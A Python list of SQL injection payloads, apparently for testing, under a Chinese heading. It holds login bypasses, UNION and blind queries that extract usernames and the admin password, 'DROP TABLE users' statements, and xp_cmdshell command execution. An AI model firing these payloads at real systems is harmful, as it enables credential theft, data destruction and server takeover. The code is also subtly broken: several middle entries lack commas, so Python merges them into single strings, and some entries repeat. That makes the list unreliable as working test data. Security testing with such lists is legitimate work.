SQL 注入测试样本列表
SQL_INJECTION_PAYLOADS = [
"'",
'"',
"' OR '1'='1' --",
"' OR '1'='1' /*",
"' OR 1=1 --",
"' OR 1=1 /*",
"' UNION SELECT NULL, username, password FROM users --",
"' UNION SELECT 1, @@version --",
"' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a' --",
"' HAVING 1=1 --",
"'; DROP TABLE users; --",
"'; EXEC xp_cmdshell('whoami'); --",
"'; SELECT * FROM information_schema.tables; --",
"' AND 1=(SELECT COUNT(*) FROM users) --",
"'; SELECT concat(username, ':', password) FROM users --",
"'; WAITFOR DELAY '0:0:5'; --",
"' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1/0) END) --",
"' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL --",
"' AND EXISTS(SELECT * FROM users WHERE username='admin') --",
"'; SELECT @@datadir; --",
"' AND ascii(substring((SELECT password FROM users WHERE username='admin'),1,1)) > 100 --",
"'; WAITFOR DELAY \'0:0:10\' --'"
"' AND 1=1 /* OR 1=2 */"
"' UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema = database() --"
"' AND (SELECT ASCII(SUBSTRING((SELECT column_name FROM table_name LIMIT 0,1), 1, 1)) = 104) --"
"' UNION SELECT NULL, (SELECT column_name FROM table_name) --"
"' UNION SELECT NULL, (SELECT column_name FROM table_name) --"
"' AND (SELECT CAST(1 AS CHAR) FROM DUAL) --"
"' AND (SELECT 1) AND (SELECT 2) --"
"' OR '1'='1' --",
"' OR 1=1 --",
"' OR 1=1 /*",
"' OR 1=1 #",
"' OR 1=1 --",
"' UNION SELECT NULL, username, password FROM users --",
"' UNION SELECT NULL, table_name FROM information_schema.tables --",
"' UNION SELECT username, password FROM users WHERE '1' = '1' --",
"' UNION SELECT 1, database() --",
"' UNION SELECT NULL, COUNT(*) FROM users --",
"' AND 1=(SELECT COUNT(*) FROM users) --",
"' AND (SELECT SUBSTRING(@@version,1,1)) = '5' --",
"'; WAITFOR DELAY '0:0:5'; --",
"'; EXEC xp_cmdshell('whoami'); --",
"'; EXECUTE IMMEDIATE 'DROP TABLE users'; --",
"'; SELECT @@datadir; --",
"'; SELECT GROUP_CONCAT(username) FROM users; --",
"'; SELECT * FROM information_schema.columns WHERE table_name='users'; --",
"' AND 1=(SELECT CASE WHEN (username='admin') THEN 1 ELSE 0 END FROM users LIMIT 1) --",
"' AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username='admin')='a' --",
"' AND 1=CONVERT(int, (SELECT @@version)) --",
"' AND 1=(SELECT TOP 1 NULL FROM users) --",
"' AND (SELECT username FROM users WHERE username LIKE 'ad%') IS NOT NULL --",
"' AND NOT EXISTS(SELECT * FROM users WHERE username='admin') --",
"' AND 1 IN (SELECT COUNT(*) FROM users) --",
"' UNION SELECT NULL, NULL, NULL --",
"' UNION SELECT NULL, (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) --",
"' AND (SELECT CAST(1 AS CHAR) FROM dual) --",
"'; SELECT 1; --",
"'; IF(1=1) WAITFOR DELAY '0:0:5' --",
"'; IF NOT EXISTS (SELECT * FROM users) WAITFOR DELAY '0:0:10' --",
"' AND (SELECT 1) = 1 --",
"' AND (SELECT CASE WHEN (username='admin') THEN 1 ELSE 0 END) = 1 --",
"' AND (SELECT LENGTH(password) FROM users WHERE username='admin') > 5 --",
"'; IF((SELECT username FROM users WHERE username='admin') = 'admin') WAITFOR DELAY '0:0:5' --",
"'; IF((SELECT COUNT(*) FROM users) > 0) WAITFOR DELAY '0:0:5' --",
"'; DECLARE @result INT; SET @result = (SELECT COUNT(*) FROM users); IF @result = 1 WAITFOR DELAY '0:0:5' --",
"' UNION SELECT NULL, table_name FROM information_schema.tables WHERE table_schema=database() --",
"' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users' --",
"'; DECLARE @sql NVARCHAR(MAX); SET @sql = 'SELECT * FROM users'; EXEC sp_executesql @sql; --",
"'; SET @sql = 'DROP TABLE users'; EXEC(@sql); --",
"' AND ASCII(SUBSTRING((SELECT TOP 1 password FROM users WHERE username='admin'), 1, 1)) = 97 --",
"' AND LENGTH(username) = 5 --",
"' AND (SELECT CASE WHEN (SELECT password FROM users WHERE username='admin') LIKE 'a%' THEN 1 ELSE 0 END) = 1 --",
]